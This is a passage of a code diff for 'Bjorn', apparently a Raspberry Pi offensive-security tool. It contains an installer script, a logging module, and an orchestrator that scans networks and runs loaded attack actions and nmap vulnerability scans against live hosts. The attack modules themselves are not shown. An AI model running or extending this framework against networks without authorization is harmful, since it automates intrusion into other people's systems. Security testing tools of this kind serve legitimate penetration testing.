if [[ "$1" == "--help" ]]; then
echo "Usage: sudo ./install_bjorn.sh"
echo "Make sure you have the necessary permissions and that all dependencies are met."
exit 0
fi
# Function to display progress
show_progress() {
echo -e "${BLUE}Step $CURRENT_STEP of $TOTAL_STEPS: $1${NC}"
}
# Logging function
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" >> "$LOG_FILE"
if [ "$VERBOSE" = true ] || [ "$level" != "DEBUG" ]; then
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
fi
}
# Error handling function
handle_error() {
local error_code=$?
local error_message=$1
log "ERROR" "An error occurred during: $error_message (Error code: $error_code)"
log "ERROR" "Check the log file for details: $LOG_FILE"
echo -e "\n${RED}Would you like to:"
echo "1. Retry this step"
echo "2. Skip this step (not recommended)"
echo "3. Exit installation${NC}"
read -r choice
case $choice in
1) return 1 ;; # Retry
2) return 0 ;; # Skip
3) clean_exit 1 ;; # Exit
*) handle_error "$error_message" ;; # Invalid choice
esac
}
# Function to check command success
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# # Check system compatibility
# check_system_compatibility() {
# log "INFO" "Checking system compatibility..."
# # Check if running on Raspberry Pi
# if ! grep -q "Raspberry Pi" /proc/cpuinfo; then
# log "WARNING" "This system might not be a Raspberry Pi. Continue anyway? (y/n)"
# read -r response
# if [[ ! "$response" =~ ^[Yy]$ ]]; then
# clean_exit 1
# fi
# fi
# check_success "System compatibility check completed"
# }
# Check system compatibility
check_system_compatibility() {
log "INFO" "Checking system compatibility..."
local should_ask_confirmation=false
# Check if running on Raspberry Pi
if ! grep -q "Raspberry Pi" /proc/cpuinfo; then
log "WARNING" "This system might not be a Raspberry Pi"
should_ask_confirmation=true
fi
# Check RAM (Raspberry Pi Zero has 512MB RAM)
total_ram=$(free -m | awk '/^Mem:/{print $2}')
if [ "$total_ram" -lt 429 ]; then
log "WARNING" "Low RAM detected. Required: 512MB, Found: ${total_ram}MB"
echo -e "${YELLOW}Your system has less RAM than recommended. This might affect performance.${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "RAM check passed: ${total_ram}MB available"
fi
# Check available disk space
available_space=$(df -m /home | awk 'NR==2 {print $4}')
if [ "$available_space" -lt 1024 ]; then
log "WARNING" "Low disk space. Recommended: 1GB, Found: ${available_space}MB"
echo -e "${YELLOW}Your system has less free space than recommended. This might affect installation.${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "Disk space check passed: ${available_space}MB available"
fi
# Check OS version
if [ -f "/etc/os-release" ]; then
source /etc/os-release
# Verify if it's Raspbian
if [ "$NAME" != "Raspbian GNU/Linux" ]; then
log "WARNING" "Different OS detected. Recommended: Raspbian GNU/Linux, Found: ${NAME}"
echo -e "${YELLOW}Your system is not running Raspbian GNU/Linux.${NC}"
should_ask_confirmation=true
fi
# Compare versions (expecting Bookworm = 12)
expected_version="12"
if [ "$VERSION_ID" != "$expected_version" ]; then
log "WARNING" "Different OS version detected"
echo -e "${YELLOW}This script was tested with Raspbian GNU/Linux 12 (bookworm)${NC}"
echo -e "${YELLOW}Current system: ${PRETTY_NAME}${NC}"
if [ "$VERSION_ID" -lt "$expected_version" ]; then
echo -e "${YELLOW}Your system version ($VERSION_ID) is older than recommended ($expected_version)${NC}"
elif [ "$VERSION_ID" -gt "$expected_version" ]; then
echo -e "${YELLOW}Your system version ($VERSION_ID) is newer than tested ($expected_version)${NC}"
fi
should_ask_confirmation=true
else
log "SUCCESS" "OS version check passed: ${PRETTY_NAME}"
fi
else
log "WARNING" "Could not determine OS version (/etc/os-release not found)"
should_ask_confirmation=true
fi
# Check if system is 32-bit ARM (armhf)
architecture=$(dpkg --print-architecture)
if [ "$architecture" != "armhf" ]; then
log "WARNING" "Different architecture detected. Expected: armhf, Found: ${architecture}"
echo -e "${YELLOW}This script was tested with armhf architecture${NC}"
should_ask_confirmation=true
fi
# Additional Pi Zero specific checks if possible
if ! (grep -q "Pi Zero" /proc/cpuinfo || grep -q "BCM2835" /proc/cpuinfo); then
log "WARNING" "Could not confirm if this is a Raspberry Pi Zero"
echo -e "${YELLOW}This script was designed for Raspberry Pi Zero${NC}"
should_ask_confirmation=true
else
log "SUCCESS" "Raspberry Pi Zero detected"
fi
if [ "$should_ask_confirmation" = true ]; then
echo -e "\n${YELLOW}Some system compatibility warnings were detected (see above).${NC}"
echo -e "${YELLOW}The installation might not work as expected.${NC}"
echo -e "${YELLOW}Do you want to continue anyway? (y/n)${NC}"
read -r response
if [[ ! "$response" =~ ^[Yy]$ ]]; then
log "INFO" "Installation aborted by user after compatibility warnings"
clean_exit 1
fi
else
log "SUCCESS" "All compatibility checks passed"
fi
log "INFO" "System compatibility check completed"
return 0
}
# Install system dependencies
install_dependencies() {
log "INFO" "Installing system dependencies..."
# Update package list
apt-get update
# List of required packages based on README
packages=(
"python3-pip"
"wget"
"lsof"
"git"
"libopenjp2-7"
"nmap"
"libopenblas-dev"
"bluez-tools"
"bluez"
"dhcpcd5"
"bridge-utils"
"python3-pil"
"libjpeg-dev"
"zlib1g-dev"
"libpng-dev"
"python3-dev"
"libffi-dev"
"libssl-dev"
"libgpiod-dev"
"libi2c-dev"
"libatlas-base-dev"
"build-essential"
)
# Install packages
for package in "${packages[@]}"; do
log "INFO" "Installing $package..."
apt-get install -y "$package"
check_success "Installed $package"
done
# Update nmap scripts
nmap --script-updatedb
check_success "Dependencies installation completed"
}
# Configure system limits
configure_system_limits() {
log "INFO" "Configuring system limits..."
# Configure /etc/security/limits.conf
cat >> /etc/security/limits.conf << EOF
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
EOF
# Configure systemd limits
sed -i 's/#DefaultLimitNOFILE=/DefaultLimitNOFILE=65535/' /etc/systemd/system.conf
sed -i 's/#DefaultLimitNOFILE=/DefaultLimitNOFILE=65535/' /etc/systemd/user.conf
# Create /etc/security/limits.d/90-nofile.conf
cat > /etc/security/limits.d/90-nofile.conf << EOF
root soft nofile 65535
root hard nofile 65535
EOF
# Configure sysctl
echo "fs.file-max = 2097152" >> /etc/sysctl.conf
sysctl -p
check_success "System limits configuration completed"
}
# Configure SPI and I2C
configure_interfaces() {
log "INFO" "Configuring SPI and I2C interfaces..."
# Enable SPI and I2C using raspi-config
raspi-config nonint do_spi 0
raspi-config nonint do_i2c 0
check_success "Interface configuration completed"
}
# Setup BJORN
setup_bjorn() {
log "INFO" "Setting up BJORN..."
# Create BJORN user if it doesn't exist
if ! id -u $BJORN_USER >/dev/null 2>&1; then
adduser --disabled-password --gecos "" $BJORN_USER
check_success "Created BJORN user"
fi
# Check for existing BJORN directory
cd /home/$BJORN_USER
if [ -d "Bjorn" ]; then
log "INFO" "Using existing BJORN directory"
echo -e "${GREEN}Using existing BJORN directory${NC}"
else
# No existing directory, proceed with clone
log "INFO" "Cloning BJORN repository"
git clone https://github.com/infinition/Bjorn.git
check_success "Cloned BJORN repository"
fi
cd Bjorn
# Install requirements with --break-system-packages flag
log "INFO" "Installing Python requirements..."
pip3 install -r requirements.txt --break-system-packages
check_success "Installed Python requirements"
# Set correct permissions
chown -R $BJORN_USER:$BJORN_USER /home/$BJORN_USER/Bjorn
chmod -R 755 /home/$BJORN_USER/Bjorn
# Add bjorn user to necessary groups
usermod -a -G spi,gpio,i2c $BJORN_USER
check_success "Added bjorn user to required groups"
}
# Configure services
setup_services() {
log "INFO" "Setting up system services..."
# Create kill_port_8000.sh script
cat > $BJORN_PATH/kill_port_8000.sh << 'EOF'
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
EOF
chmod +x $BJORN_PATH/kill_port_8000.sh
# Create BJORN service
cat > /etc/systemd/system/bjorn.service << EOF
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
[Install]
WantedBy=multi-user.target
EOF
# Configure PAM
echo "session required pam_limits.so" >> /etc/pam.d/common-session
echo "session required pam_limits.so" >> /etc/pam.d/common-session-noninteractive
# Enable and start services
systemctl daemon-reload
systemctl enable bjorn.service
check_success "Services setup completed"
}
# Configure USB Gadget
configure_usb_gadget() {
log "INFO" "Configuring USB Gadget..."
# Modify cmdline.txt
sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
# Modify config.txt
echo "dtoverlay=dwc2" >> /boot/firmware/config.txt
# Create USB gadget script
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do  # Writing the UDC name into 'UDC' binds the gadget to the controller
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
# Create USB gadget service
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
# Configure network interface
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
EOF
# Enable and start services
systemctl daemon-reload
systemctl enable systemd-networkd
systemctl enable usb-gadget
systemctl start systemd-networkd
systemctl start usb-gadget
check_success "USB Gadget configuration completed"
}
# Verify installation
verify_installation() {
log "INFO" "Verifying installation..."
# Check if services are running
if ! systemctl is-active --quiet bjorn.service; then
log "WARNING" "BJORN service is not running"
else
log "SUCCESS" "BJORN service is running"
fi
# Check web interface
sleep 5
if curl -s http://localhost:8000 > /dev/null; then
log "SUCCESS" "Web interface is accessible"
else
log "WARNING" "Web interface is not responding"
fi
}
# Clean exit function
clean_exit() {
local exit_code=$1
if [ $exit_code -eq 0 ]; then
log "SUCCESS" "BJORN installation completed successfully!"
log "INFO" "Log file available at: $LOG_FILE"
else
log "ERROR" "BJORN installation failed!"
log "ERROR" "Check the log file for details: $LOG_FILE"
fi
exit $exit_code
}
# Main installation process
main() {
log "INFO" "Starting BJORN installation..."
# Check if script is run as root
if [ "$(id -u)" -ne 0 ]; then
echo "This script must be run as root. Please use 'sudo'."
exit 1
fi
echo -e "${BLUE}BJORN Installation Options:${NC}"
echo "1. Full installation (recommended)"
echo "2. Custom installation"
read -p "Choose an option (1/2): " install_option
case $install_option in
1)
CURRENT_STEP=1; show_progress "Checking system compatibility"
check_system_compatibility
CURRENT_STEP=2; show_progress "Installing system dependencies"
install_dependencies
CURRENT_STEP=3; show_progress "Configuring system limits"
configure_system_limits
CURRENT_STEP=4; show_progress "Configuring interfaces"
configure_interfaces
CURRENT_STEP=5; show_progress "Setting up BJORN"
setup_bjorn
CURRENT_STEP=6; show_progress "Configuring USB Gadget"
configure_usb_gadget
CURRENT_STEP=7; show_progress "Setting up services"
setup_services
CURRENT_STEP=8; show_progress "Verifying installation"
verify_installation
;;
2)
echo "Custom installation - select components to install:"
read -p "Install dependencies? (y/n): " deps
read -p "Configure system limits? (y/n): " limits
read -p "Configure interfaces? (y/n): " interfaces
read -p "Setup BJORN? (y/n): " bjorn
read -p "Configure USB Gadget? (y/n): " usb_gadget
read -p "Setup services? (y/n): " services
[ "$deps" = "y" ] && install_dependencies
[ "$limits" = "y" ] && configure_system_limits
[ "$interfaces" = "y" ] && configure_interfaces
[ "$bjorn" = "y" ] && setup_bjorn
[ "$usb_gadget" = "y" ] && configure_usb_gadget
[ "$services" = "y" ] && setup_services
verify_installation
;;
*)
log "ERROR" "Invalid option selected"
clean_exit 1
;;
esac
log "SUCCESS" "BJORN installation completed!"
log "INFO" "Please reboot your system to apply all changes."
echo -e "\n${GREEN}Installation completed successfully!${NC}"
echo -e "${YELLOW}Important notes:${NC}"
echo "1. If configuring Windows PC for USB gadget connection:"
echo " - Set static IP: 172.20.2.2"
echo " - Subnet Mask: 255.255.255.0"
echo " - Default Gateway: 172.20.2.1"
echo " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo "2. Web interface will be available at: http://[device-ip]:8000"
echo "3. Make sure your e-Paper HAT (2.13-inch) is properly connected"
read -p "Would you like to reboot now? (y/n): " reboot_now
if [ "$reboot_now" = "y" ]; then
if reboot; then
log "INFO" "System reboot initiated."
else
log "ERROR" "Failed to initiate reboot."
exit 1
fi
else
echo -e "${YELLOW}Reboot your system to apply all changes & run Bjorn service.${NC}"
fi
}
main

11
kill_port_8000.sh Normal file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
# Script to kill processes using port 8000
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing the following PIDs using port $PORT: $PIDS"
kill -9 $PIDS
else
echo "No processes found using port $PORT"
fi

136
logger.py Normal file
View File

@@ -0,0 +1,136 @@
#logger.py
# Description:
# This file, logger.py, is responsible for setting up a robust logging system for the Bjorn project. It defines custom logging levels and formats,
# integrates with the Rich library for enhanced console output, and ensures logs are written to rotating files for persistence.
#
# Key functionalities include:
# - Defining a custom log level "SUCCESS" to log successful operations distinctively.
# - Creating a vertical filter to exclude specific log messages based on their content.
# - Setting up a logger class (`Logger`) that initializes logging handlers for both console and file output.
# - Utilizing Rich for console logging with custom themes for different log levels, providing a more readable and visually appealing log output.
# - Ensuring log files are written to a specified directory, with file rotation to manage log file sizes and backups.
# - Providing methods to log messages at various levels (debug, info, warning, error, critical, success).
# - Allowing dynamic adjustment of log levels and the ability to disable logging entirely.
import logging
from logging.handlers import RotatingFileHandler
import os
from rich.console import Console
from rich.logging import RichHandler
from rich.theme import Theme
# Define custom log level "SUCCESS"
SUCCESS_LEVEL_NUM = 25
logging.addLevelName(SUCCESS_LEVEL_NUM, "SUCCESS")
def success(self, message, *args, **kwargs):
if self.isEnabledFor(SUCCESS_LEVEL_NUM):
self._log(SUCCESS_LEVEL_NUM, message, args, **kwargs)
logging.Logger.success = success
class VerticalFilter(logging.Filter):
def filter(self, record):
return 'Vertical' not in record.getMessage()
class Logger:
LOGS_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data', 'logs')
def __init__(self, name, level=logging.DEBUG, enable_file_logging=True):
self.logger = logging.getLogger(name)
self.logger.setLevel(level)
self.enable_file_logging = enable_file_logging
# Define custom log level styles
custom_theme = Theme({
"debug": "yellow",
"info": "blue",
"warning": "yellow",
"error": "bold red",
"critical": "bold magenta",
"success": "bold green"
})
console = Console(theme=custom_theme)
# Create console handler with rich and set level
console_handler = RichHandler(console=console, show_time=False, show_level=False, show_path=False, log_time_format="%Y-%m-%d %H:%M:%S")
console_handler.setLevel(level)
console_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
console_handler.setFormatter(console_formatter)
# Add filter to console handler
vertical_filter = VerticalFilter()
console_handler.addFilter(vertical_filter)
# Add console handler to the logger
self.logger.addHandler(console_handler)
if self.enable_file_logging:
# Ensure the log folder exists
os.makedirs(self.LOGS_DIR, exist_ok=True)
log_file_path = os.path.join(self.LOGS_DIR, f"{name}.log")
# Create file handler and set level
file_handler = RotatingFileHandler(log_file_path, maxBytes=5*1024*1024, backupCount=2)
file_handler.setLevel(level)
file_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
file_handler.setFormatter(file_formatter)
# Add filter to file handler
file_handler.addFilter(vertical_filter)
# Add file handler to the logger
self.logger.addHandler(file_handler)
def set_level(self, level):
self.logger.setLevel(level)
for handler in self.logger.handlers:
handler.setLevel(level)
def debug(self, message):
self.logger.debug(message)
def info(self, message):
self.logger.info(message)
def warning(self, message):
self.logger.warning(message)
def error(self, message):
self.logger.error(message)
def critical(self, message):
self.logger.critical(message)
def success(self, message):
self.logger.success('\n' + message) # Add newline for better readability
def disable_logging(self):
logging.disable(logging.CRITICAL)
# Example usage
if __name__ == "__main__":
# Change enable_file_logging to False to disable file logging
log = Logger(name="MyLogger", level=logging.DEBUG, enable_file_logging=False)
log.debug("This is a debug message")
log.info("This is an info message")
log.warning("This is a warning message")
log.error("This is an error message")
log.critical("This is a critical message")
log.success("This is a success message")
# Change log level
log.set_level(logging.WARNING)
log.debug("This debug message should not appear")
log.info("This info message should not appear")
log.warning("This warning message should appear")
# Disable logging
log.disable_logging()
log.error("This error message should not appear")

383
orchestrator.py Normal file
View File

@@ -0,0 +1,383 @@
# orchestrator.py
# Description:
# This file, orchestrator.py, is Bjorn's heuristic brain, responsible for coordinating and executing various network scanning and offensive security actions.
# It manages the loading and execution of actions, handles retries for failed and successful actions,
# and updates the status of the orchestrator.
#
# Key functionalities include:
# - Initializing and loading actions from a configuration file, including network and vulnerability scanners.
# - Managing the execution of actions on network targets, checking for open ports and handling retries based on success or failure.
# - Coordinating the execution of parent and child actions, ensuring actions are executed in a logical order.
# - Running the orchestrator cycle to continuously check for and execute actions on available network targets.
# - Handling and updating the status of the orchestrator, including scanning for new targets and performing vulnerability scans.
# - Implementing threading to manage concurrent execution of actions with a semaphore to limit active threads.
# - Logging events and errors to ensure maintainability and ease of debugging.
# - Handling graceful degradation by managing retries and idle states when no new targets are found.
import json
import importlib
import time
import logging
import sys
import threading
from datetime import datetime, timedelta
from actions.nmap_vuln_scanner import NmapVulnScanner
from init_shared import shared_data
from logger import Logger
logger = Logger(name="orchestrator.py", level=logging.DEBUG)
class Orchestrator:
def __init__(self):
"""Initialise the orchestrator"""
self.shared_data = shared_data
self.actions = [] # List of actions to be executed
self.standalone_actions = [] # List of standalone actions to be executed
self.failed_scans_count = 0 # Count the number of failed scans
self.network_scanner = None
self.last_vuln_scan_time = datetime.min # Set the last vulnerability scan time to the minimum datetime value
self.load_actions() # Load all actions from the actions file
actions_loaded = [action.__class__.__name__ for action in self.actions + self.standalone_actions] # Get the names of the loaded actions
logger.info(f"Actions loaded: {actions_loaded}")
self.semaphore = threading.Semaphore(10) # Limit the number of active threads to 10
def load_actions(self):
"""Load all actions from the actions file"""
self.actions_dir = self.shared_data.actions_dir
with open(self.shared_data.actions_file, 'r') as file:
actions_config = json.load(file)
for action in actions_config:
module_name = action["b_module"]
if module_name == 'scanning':
self.load_scanner(module_name)
elif module_name == 'nmap_vuln_scanner':
self.load_nmap_vuln_scanner(module_name)
else:
self.load_action(module_name, action)
def load_scanner(self, module_name):
"""Load the network scanner"""
module = importlib.import_module(f'actions.{module_name}')
b_class = getattr(module, 'b_class')
self.network_scanner = getattr(module, b_class)(self.shared_data)
def load_nmap_vuln_scanner(self, module_name):
"""Load the nmap vulnerability scanner"""
self.nmap_vuln_scanner = NmapVulnScanner(self.shared_data)
def load_action(self, module_name, action):
"""Load an action from the actions file"""
module = importlib.import_module(f'actions.{module_name}')
try:
b_class = action["b_class"]
action_instance = getattr(module, b_class)(self.shared_data)
action_instance.action_name = b_class
action_instance.port = action.get("b_port")
action_instance.b_parent_action = action.get("b_parent")
if action_instance.port == 0:
self.standalone_actions.append(action_instance)
else:
self.actions.append(action_instance)
except AttributeError as e:
logger.error(f"Module {module_name} is missing required attributes: {e}")
def process_alive_ips(self, current_data):
"""Process all IPs with alive status set to 1"""
any_action_executed = False
action_executed_status = None
for action in self.actions:
for row in current_data:
if row["Alive"] != '1':
continue
ip, ports = row["IPs"], row["Ports"].split(';')
action_key = action.action_name
if action.b_parent_action is None:
with self.semaphore:
if self.execute_action(action, ip, ports, row, action_key, current_data):
action_executed_status = action_key
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
for child_action in self.actions:
if child_action.b_parent_action == action_key:
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, child_action.action_name, current_data):
action_executed_status = child_action.action_name
self.shared_data.bjornorch_status = action_executed_status
break
break
for child_action in self.actions:
if child_action.b_parent_action:
action_key = child_action.action_name
for row in current_data:
ip, ports = row["IPs"], row["Ports"].split(';')
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, action_key, current_data):
action_executed_status = child_action.action_name
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
break
return any_action_executed
def execute_action(self, action, ip, ports, row, action_key, current_data):
"""Execute an action on a target"""
if hasattr(action, 'port') and str(action.port) not in ports:
return False
# Check parent action status
if action.b_parent_action:
parent_status = row.get(action.b_parent_action, "")
if 'success' not in parent_status:
return False # Skip child action if parent action has not succeeded
# Check if the action is already successful and if retries are disabled for successful actions
if 'success' in row[action_key]:
if not self.shared_data.retry_success_actions:
return False
else:
try:
last_success_time = datetime.strptime(row[action_key].split('_')[1] + "_" + row[action_key].split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping action {action.action_name} for {ip}:{action.port} due to success retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the success retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last success time for {action.action_name}: {ve}")
last_failed_time_str = row.get(action_key, "")
if 'failed' in last_failed_time_str:
try:
last_failed_time = datetime.strptime(last_failed_time_str.split('_')[1] + "_" + last_failed_time_str.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping action {action.action_name} for {ip}:{action.port} due to failed retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last failed time for {action.action_name}: {ve}")
try:
logger.info(f"Executing action {action.action_name} for {ip}:{action.port}")
self.shared_data.bjornstatustext2 = ip
result = action.execute(ip, str(action.port), row, action_key)
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row[action_key] = f'success_{timestamp}'
else:
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return result == 'success'
except Exception as e:
logger.error(f"Action {action.action_name} failed: {e}")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return False
def execute_standalone_action(self, action, current_data):
"""Execute a standalone action"""
row = next((r for r in current_data if r["MAC Address"] == "STANDALONE"), None)
if not row:
row = {
"MAC Address": "STANDALONE",
"IPs": "STANDALONE",
"Hostnames": "STANDALONE",
"Ports": "0",
"Alive": "0"
}
current_data.append(row)
action_key = action.action_name
if action_key not in row:
row[action_key] = ""
# Check if the action is already successful and if retries are disabled for successful actions
if 'success' in row[action_key]:
if not self.shared_data.retry_success_actions:
return False
else:
try:
last_success_time = datetime.strptime(row[action_key].split('_')[1] + "_" + row[action_key].split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping standalone action {action.action_name} due to success retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the success retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last success time for {action.action_name}: {ve}")
last_failed_time_str = row.get(action_key, "")
if 'failed' in last_failed_time_str:
try:
last_failed_time = datetime.strptime(last_failed_time_str.split('_')[1] + "_" + last_failed_time_str.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping standalone action {action.action_name} due to failed retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last failed time for {action.action_name}: {ve}")
try:
logger.info(f"Executing standalone action {action.action_name}")
result = action.execute()
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row[action_key] = f'success_{timestamp}'
logger.info(f"Standalone action {action.action_name} executed successfully")
else:
row[action_key] = f'failed_{timestamp}'
logger.error(f"Standalone action {action.action_name} failed")
self.shared_data.write_data(current_data)
return result == 'success'
except Exception as e:
logger.error(f"Standalone action {action.action_name} failed: {e}")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return False
def run(self):
"""Run the orchestrator cycle to execute actions"""
#Run the scanner a first time to get the initial data
self.shared_data.bjornorch_status = "NetworkScanner"
self.shared_data.bjornstatustext2 = "First scan..."
self.network_scanner.scan()
self.shared_data.bjornstatustext2 = ""
while not self.shared_data.orchestrator_should_exit:
current_data = self.shared_data.read_data()
any_action_executed = False
action_executed_status = None
action_retry_pending = False
any_action_executed = self.process_alive_ips(current_data)
for action in self.actions:
for row in current_data:
if row["Alive"] != '1':
continue
ip, ports = row["IPs"], row["Ports"].split(';')
action_key = action.action_name
if action.b_parent_action is None:
with self.semaphore:
if self.execute_action(action, ip, ports, row, action_key, current_data):
action_executed_status = action_key
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
for child_action in self.actions:
if child_action.b_parent_action == action_key:
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, child_action.action_name, current_data):
action_executed_status = child_action.action_name
self.shared_data.bjornorch_status = action_executed_status
break
break
for child_action in self.actions:
if child_action.b_parent_action:
action_key = child_action.action_name
for row in current_data:
ip, ports = row["IPs"], row["Ports"].split(';')
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, action_key, current_data):
action_executed_status = child_action.action_name
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
break
self.shared_data.write_data(current_data)
if not any_action_executed:
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
logger.info("No available targets. Running network scan...")
if self.network_scanner:
self.shared_data.bjornorch_status = "NetworkScanner"
self.network_scanner.scan()
                    # Re-read the updated data after the scan
current_data = self.shared_data.read_data()
any_action_executed = self.process_alive_ips(current_data)
if self.shared_data.scan_vuln_running:
current_time = datetime.now()
if current_time >= self.last_vuln_scan_time + timedelta(seconds=self.shared_data.scan_vuln_interval):
try:
logger.info("Starting vulnerability scans...")
for row in current_data:
if row["Alive"] == '1':
ip = row["IPs"]
scan_status = row.get("NmapVulnScanner", "")
# Check success retry delay
if 'success' in scan_status:
last_success_time = datetime.strptime(scan_status.split('_')[1] + "_" + scan_status.split('_')[2], "%Y%m%d_%H%M%S")
if not self.shared_data.retry_success_actions:
logger.warning(f"Skipping vulnerability scan for {ip} because retry on success is disabled.")
continue # Skip if retry on success is disabled
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping vulnerability scan for {ip} due to success retry delay, retry possible in: {formatted_retry_in}")
# Skip if the retry delay has not passed
continue
# Check failed retry delay
if 'failed' in scan_status:
last_failed_time = datetime.strptime(scan_status.split('_')[1] + "_" + scan_status.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping vulnerability scan for {ip} due to failed retry delay, retry possible in: {formatted_retry_in}")
continue
with self.semaphore:
result = self.nmap_vuln_scanner.execute(ip, row, "NmapVulnScanner")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row["NmapVulnScanner"] = f'success_{timestamp}'
else:
row["NmapVulnScanner"] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
self.last_vuln_scan_time = current_time
except Exception as e:
logger.error(f"Error during vulnerability scan: {e}")
else:
logger.warning("No network scanner available.")
